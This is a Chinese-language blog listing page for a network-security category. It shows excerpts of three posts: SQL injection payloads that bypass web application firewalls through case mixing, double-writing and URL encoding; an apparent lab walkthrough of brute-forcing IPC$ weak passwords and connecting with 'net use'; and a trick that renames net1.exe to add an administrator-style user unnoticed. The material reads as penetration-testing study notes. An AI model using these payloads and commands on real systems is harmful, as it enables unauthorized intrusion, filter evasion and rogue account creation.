网络安全共3篇
排序

SQL注入过WAF思路

SQL注入过WAF思路-熊大百宝箱
大小写 id=-1 uNIoN sELecT 1,2,3 双写 id=-1 UNIunionON SELselectECT 1,2,3 编码 id=1%252f%252a*/UNION%252f%252a /SELECT id=1%D6‘%20AND%201=2%23 SELECT 'Ä'='A'; #1 十六进制 id=-1 /*...
# id# select
ForDream的头像-熊大百宝箱ForDream2年前
04030

IPC远程命令

IPC远程命令-熊大百宝箱
我们首先来扫描目标主机是否存在IPC弱口令(PS:废话,靶机肯定存在了) 命令行下ping靶机IP:10.1.1.2,确认靶机存在。     爆破成功后,与目标主机建立IPC net use \\攻击方IP\ipc$...
# 木马# ipc# 主机
ForDream的头像-熊大百宝箱ForDream2年前
03920

添加用户(绕过)

添加用户(绕过)-熊大百宝箱
copy c:\windows\system32\net1.exe aaa.txt aaa.txt user y11 Aa123456@@@ /add  
# txt# aaa# copy
ForDream的头像-熊大百宝箱ForDream2年前
04030